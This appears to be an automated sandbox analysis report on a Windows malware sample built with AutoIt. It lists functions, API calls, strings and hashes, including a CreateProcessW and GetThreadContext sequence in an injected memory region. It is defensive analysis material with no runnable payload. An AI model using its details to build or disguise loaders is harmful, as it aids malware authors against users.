Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$Close___create$Handle__close_nolock__free_osfhnd$ChangeFindNotificationType__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: 9AB$@
API String ID: 3388700018-3180456746
Opcode ID: b4ebc272f4a5173885d57415bbae321b982e31dafe422be4333bb6231f5e9376
Instruction ID: 80488fc51811e5e576a6d197565037dd452796c89655b3efeddacc503c70afca
Opcode Fuzzy Hash: b4ebc272f4a5173885d57415bbae321b982e31dafe422be4333bb6231f5e9376
Instruction Fuzzy Hash: 8C226871A04116ABEF289F68DC517AE7B30EB08324F25A22FE561A73D1C73D8D40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404257, Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe,00000104,?,00000000,00000001,00000000), ref: 0040428C

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

Part of subcall function 00421BC7: __wcsicmp_l.LIBCMT ref: 00421C50

_wcscpy.LIBCMT ref: 004043C0
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0047214E

Strings

CMDLINERAW, xrefs: 004042AD
/ErrorStdOut, xrefs: 0040434B
/AutoIt3OutputDebug, xrefs: 00404360
C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, xrefs: 00404283, 00404288, 00404292, 004043BB, 004043D9, 0047213B, 00472192
/AutoIt3ExecuteLine, xrefs: 00404375
/AutoIt3ExecuteScript, xrefs: 0040438A
CMDLINE, xrefs: 004042DA, 004042DF, 0040430D

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe$CMDLINE$CMDLINERAW
API String ID: 861526374-1375464884
Opcode ID: 3ece3b871f5a5703d87b22c94716858d3a766b63b5d7eb656f32dc925dd9cc14
Instruction ID: 820765bed6ed14ae373d4bfe25b45f5faa4c064077700d2934aee31a5d6d71d4
Opcode Fuzzy Hash: 3ece3b871f5a5703d87b22c94716858d3a766b63b5d7eb656f32dc925dd9cc14
Instruction Fuzzy Hash: EC8182B2900119AACB04EBE1DD52EEF7B78AF55354F50002FE641B70D2EF786A04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004030A5, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 004030B0
LoadCursorW.USER32(00000000,00007F00), ref: 004030BF
LoadIconW.USER32(00000063), ref: 004030D5
LoadIconW.USER32(000000A4), ref: 004030E7
LoadIconW.USER32(000000A2), ref: 004030F9

Part of subcall function 0040318A: LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 004031AE

RegisterClassExW.USER32(?), ref: 00403167

Part of subcall function 00402F58: GetSysColorBrush.USER32(0000000F), ref: 00402F8B
Part of subcall function 00402F58: RegisterClassExW.USER32(00000030), ref: 00402FB5
Part of subcall function 00402F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00402FC6
Part of subcall function 00402F58: LoadIconW.USER32(000000A9), ref: 00403009

Strings

#, xrefs: 00403140
AutoIt v3, xrefs: 00403156
0, xrefs: 00403139

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 42c7ff5175b4c79dc400808e8a7b7e991cc3fb6d2f5c59f1bd7005ba86c087a2
Instruction ID: 7b31718a42e0e49ab1eec084212dbb185e115a305abd39692e1369e99f7f1873
Opcode Fuzzy Hash: 42c7ff5175b4c79dc400808e8a7b7e991cc3fb6d2f5c59f1bd7005ba86c087a2
Instruction Fuzzy Hash: 0D214CB4D00304AFCB409FAAEC09E99BFF5FB49310F14453AE604A62B2D7B845408F99

Uniqueness

Uniqueness Score: -1.00%

Function 00402F58, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00402F8B
RegisterClassExW.USER32(00000030), ref: 00402FB5
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00402FC6
LoadIconW.USER32(000000A9), ref: 00403009

Strings

0, xrefs: 00402F6D
TaskbarCreated, xrefs: 00402FBB
AutoIt v3 GUI, xrefs: 00402FA7
+, xrefs: 00402F74

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 2b6c41e4040db28f4667c462cb71b2e17ad0b55b1eac86ebf24f3f2aa35f83f8
Instruction ID: 816dc339f945cc1f83db97bbe112b8002981f8cf8f76ae7c1948c6518933b0fd
Opcode Fuzzy Hash: 2b6c41e4040db28f4667c462cb71b2e17ad0b55b1eac86ebf24f3f2aa35f83f8
Instruction Fuzzy Hash: A121E3B5D01308AFDB40AFA4EC49BCDBBF4FB09704F10452AF611A62A0D7B44544CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403DCB, Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00403F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004034E2,?,00000001), ref: 00403FCD

_free.LIBCMT ref: 00473C27
_free.LIBCMT ref: 00473C6E

Part of subcall function 0040BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,004C22E8,?,00000000,?,00403E2E,?,00000000,?,0049DBF0,00000000,?), ref: 0040BE8B
Part of subcall function 0040BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00403E2E,?,00000000,?,0049DBF0,00000000,?,00000002), ref: 0040BEA7
Part of subcall function 0040BDF0: __wsplitpath.LIBCMT ref: 0040BF19
Part of subcall function 0040BDF0: _wcscpy.LIBCMT ref: 0040BF31
Part of subcall function 0040BDF0: _wcscat.LIBCMT ref: 0040BF46
Part of subcall function 0040BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0040BF56

Strings

Bad directive syntax error, xrefs: 00473C54
E<@, xrefs: 00473B58
>>>AUTOIT SCRIPT<<<, xrefs: 00473A01
G-@, xrefs: 00473A4F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<@$G-@
API String ID: 1510338132-1291570755
Opcode ID: dec8a7b8e20733182dacde8c8b0fd38c1e7c5bea14cc561414b7e4c631d4ccbf
Instruction ID: f97ebc2e4e06abb83b185e734ac93c7895ec23ab9f2591dc76430e78cc639715
Opcode Fuzzy Hash: dec8a7b8e20733182dacde8c8b0fd38c1e7c5bea14cc561414b7e4c631d4ccbf
Instruction Fuzzy Hash: 47917171A00219AFCF04EFA5CC819EE77B4BF04315F14416FF416AB291DB78AA05DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402E9D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00402ECB
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00402EEC
ShowWindow.USER32(00000000), ref: 00402F00
ShowWindow.USER32(00000000), ref: 00402F09

Strings

AutoIt v3, xrefs: 00402EC3, 00402EC8, 00402EC9
edit, xrefs: 00402EE6

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 23d875a3550d2c33e861dcb3cbf3f193f63146c67f5e904b677ccbd94064dac9
Instruction ID: d579feeed3eea00246a8a98e03809108b4a3b8582045bace2dd24f4835a2aa64
Opcode Fuzzy Hash: 23d875a3550d2c33e861dcb3cbf3f193f63146c67f5e904b677ccbd94064dac9
Instruction Fuzzy Hash: 4FF030709402D07AD77057536C48E672E7DEBC7F20F01403FB904A21B1C16508A1CA78

Uniqueness

Uniqueness Score: -1.00%

Function 05160F91, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 591processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0516138F
GetThreadContext.KERNEL32(?,00010007), ref: 051613B2

Strings

D, xrefs: 051611F3

Memory Dump Source

Source File: 00000001.00000002.261826032.0000000005160000.00000040.00000001.sdmp, Offset: 05160000, based on PE: false

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: 3e106712545e4f09e5a526978aa2394032229cf6cde96f6ca51fa183b094075f
Instruction ID: ab78147ed7ed9c50bc82b066706fddfa3abeaeeec10cb77c778b2d1f52fd61da
Opcode Fuzzy Hash: 3e106712545e4f09e5a526978aa2394032229cf6cde96f6ca51fa183b094075f
Instruction Fuzzy Hash: 33323635E50258EFEB60CBA4DC55BADB7B5BF08700F20449AE509EB2A1D7B09E90DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0044CC82, Relevance: 9.2, APIs: 6, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 004041A7: _fseek.LIBCMT ref: 004041BF

Part of subcall function 0044CE59: _wcscmp.LIBCMT ref: 0044CF49
Part of subcall function 0044CE59: _wcscmp.LIBCMT ref: 0044CF5C

_malloc.LIBCMT ref: 0044CD7D
_malloc.LIBCMT ref: 0044CD87
_free.LIBCMT ref: 0044CDC9
_free.LIBCMT ref: 0044CDD0
_free.LIBCMT ref: 0044CE3B

Part of subcall function 004228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00428715,00000000,004288A3,00424673,?), ref: 004228DE
Part of subcall function 004228CA: GetLastError.KERNEL32(00000000,?,00428715,00000000,004288A3,00424673,?), ref: 004228F0

_free.LIBCMT ref: 0044CE43

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$_malloc_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 2231465579-0
Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
Instruction ID: b534017ff002319579a229c67dce80a5c60da39648b48e3efc7e9d1bbb4ff25e
Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
Instruction Fuzzy Hash: 52515EB1E04218AFEF159F65DC81AAEB7B9FF48304F1440AEF219A7281D7755A80CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00403A67, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(1<@), ref: 00403A7D
SHGetPathFromIDListW.SHELL32(?,?), ref: 00403AD2
SHGetDesktopFolder.SHELL32(?), ref: 00403A8F

Part of subcall function 00403B1E: _wcsncpy.LIBCMT ref: 00403B32

Strings

1<@, xrefs: 00403A70, 00403B06, 00403AF1, 00403A76, 00403AF9, 00403B09

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DesktopFolderFromListMallocPath_wcsncpy
String ID: 1<@
API String ID: 3981382179-3754389210
Opcode ID: 4f5648085dd6755a29a2975bf50e1b4685b4afdad219e53f144875a2f2f6e04e
Instruction ID: a39d9ee69cb93802a7b71aef59212dafe1e19854fe242ee2de0c3d681e3a9e26
Opcode Fuzzy Hash: 4f5648085dd6755a29a2975bf50e1b4685b4afdad219e53f144875a2f2f6e04e
Instruction Fuzzy Hash: 13219D32B00114ABCB10DF95C884DEFBBBDEF88705B0040A9F509E7295DB34AE46CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041C955, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0041C948,SwapMouseButtons,00000004,?), ref: 0041C979
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0041C948,SwapMouseButtons,00000004,?,?,?,?,0041BF22), ref: 0041C99A
RegCloseKey.KERNEL32(00000000,?,?,0041C948,SwapMouseButtons,00000004,?,?,?,?,0041BF22), ref: 0041C9BC

Strings

Control Panel\Mouse, xrefs: 0041C977

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction ID: d34a79c7de1745fdaaecafc76d189a7def4cf971e746dd0b5e10e6cb5aa31516
Opcode Fuzzy Hash: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction Fuzzy Hash: 4C117CB5961208BFDB118F64DC84EEF77B8EF05754F10446AA841E7210D2319E819B68

Uniqueness

Uniqueness Score: -1.00%

Function 0042010A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00420122

Part of subcall function 004245EC: __FF_MSGBANNER.LIBCMT ref: 00424603
Part of subcall function 004245EC: __NMSG_WRITE.LIBCMT ref: 0042460A
Part of subcall function 004245EC: RtlAllocateHeap.NTDLL(00B50000,00000000,00000001), ref: 0042462F

std::exception::exception.LIBCMT ref: 0042013E
__CxxThrowException@8.LIBCMT ref: 00420153

Part of subcall function 00427495: RaiseException.KERNEL32(?,?,0040125D,004B6598,?,?,?,00420158,0040125D,004B6598,?,00000001), ref: 004274E6

Part of subcall function 004273CB: _free.LIBCMT ref: 00427478

Strings

bad allocation, xrefs: 00420137

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_free_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3712093317-2104205924
Opcode ID: 9173de3f1d7b5420e7922bcc6571a7ad448f82e687d520b9a01e1474f4ff3b29
Instruction ID: f64628ec7e188f533ca54de3f50f9d27239d0d45f2bbb0d4966a4befc595b99f
Opcode Fuzzy Hash: 9173de3f1d7b5420e7922bcc6571a7ad448f82e687d520b9a01e1474f4ff3b29
Instruction Fuzzy Hash: 4EF0D63560412976C715BAA9F8019EE77D89F04354F90441BF90492182CBB986A0D6AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040131C, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 004016F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00401751

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040159B
CoInitialize.OLE32(00000000), ref: 00401612
CloseHandle.KERNEL32(00000000), ref: 004758F7

Strings

'/D, xrefs: 00401406, 00401450, 0040146C

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Handle$ClipboardCloseFormatInitializeRegister
String ID: '/D
API String ID: 458326420-2716742803
Opcode ID: a3a759b959f0a2ec54d8b51f88e899b7a3ea24fa54b3fcb43d1bf53d18f1c30a
Instruction ID: 8a6696685f5b870826c7b46fa6115384730c7aecf285947367e3b8bbf0fdbf0d
Opcode Fuzzy Hash: a3a759b959f0a2ec54d8b51f88e899b7a3ea24fa54b3fcb43d1bf53d18f1c30a
Instruction Fuzzy Hash: 0371AEB89022419BC788EF5AA990D94BBA4FB5B348794813FD40A973B3CB788454CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0044C0D1, Relevance: 4.5, APIs: 3, Instructions: 32COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0044C0DB

Part of subcall function 004245EC: __FF_MSGBANNER.LIBCMT ref: 00424603
Part of subcall function 004245EC: __NMSG_WRITE.LIBCMT ref: 0042460A
Part of subcall function 004245EC: RtlAllocateHeap.NTDLL(00B50000,00000000,00000001), ref: 0042462F

_malloc.LIBCMT ref: 0044C0EF
_malloc.LIBCMT ref: 0044C103

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: 908a5c5552e9e26a47e72dc8f22eb59973e222b2f93a29c55665ac18deede8c4
Instruction ID: 15f649e6039a5ef81df504e59682481f49e62f686396e21c0292d6d3c3928dff
Opcode Fuzzy Hash: 908a5c5552e9e26a47e72dc8f22eb59973e222b2f93a29c55665ac18deede8c4
Instruction Fuzzy Hash: 8DF0A7713057216BE7926EA668C1767A6D49B88392F18002FF788C7203DF7CC880CE9C

Uniqueness

Uniqueness Score: -1.00%

Function 0044C450, Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044C45E

Part of subcall function 004228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00428715,00000000,004288A3,00424673,?), ref: 004228DE
Part of subcall function 004228CA: GetLastError.KERNEL32(00000000,?,00428715,00000000,004288A3,00424673,?), ref: 004228F0

_free.LIBCMT ref: 0044C46F
_free.LIBCMT ref: 0044C481

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
Instruction ID: 2bdae296d39fa0009a0ed31ac70309297b0b2ffff4f3de4bd2d35878dc724b6f
Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
Instruction Fuzzy Hash: A2E0C2A1302710A2DA68B97A7A80BB313CC2F04310B08092FF449D3242CF6CE840803C

Uniqueness

Uniqueness Score: -1.00%

Function 00404010, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 0042010A: _malloc.LIBCMT ref: 00420122

_memmove.LIBCMT ref: 0040405A

Strings

EA06, xrefs: 004757B9

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _malloc_memmove
String ID: EA06
API String ID: 1183979061-3962188686
Opcode ID: 0362f69a8547e6e131dc53016e46b07617fd60614c31f2a2141e52072f04e65d
Instruction ID: 07888d6e4a10090ae2b0677730d9c411f66805b12b1bdad61412ca1ee84dbb9b
Opcode Fuzzy Hash: 0362f69a8547e6e131dc53016e46b07617fd60614c31f2a2141e52072f04e65d
Instruction Fuzzy Hash: FF418EF1A0411897DB118B6488557BF7FA28BD5304F18447BEB82BF2C3C63D8D8183AA

Uniqueness

Uniqueness Score: -1.00%

Function 00403BFF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00473CF1

Part of subcall function 004031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004031DA

Part of subcall function 00403A67: SHGetMalloc.SHELL32(1<@), ref: 00403A7D
Part of subcall function 00403A67: SHGetDesktopFolder.SHELL32(?), ref: 00403A8F
Part of subcall function 00403A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00403AD2

Part of subcall function 00403B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,004C22E8,?), ref: 00403B65

Strings

X, xrefs: 00473D01

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Path$FullName$DesktopFolderFromListMalloc_memset
String ID: X
API String ID: 2727075218-3081909835
Opcode ID: 0f4e2169fe280c4586a7d3a3c6ba09a998bad332c0bb1065ed7e02b089551455
Instruction ID: ec359699bd491ab09f6c4d1607f85fc7d57ff3b30fb3cc2ad1194ffcc49a1ff2
Opcode Fuzzy Hash: 0f4e2169fe280c4586a7d3a3c6ba09a998bad332c0bb1065ed7e02b089551455
Instruction Fuzzy Hash: A811ABB1A101986BCF05DF95D8055DE7FFDAF46709F00801FE501BB281CBB856498BA9

Uniqueness

Uniqueness Score: -1.00%

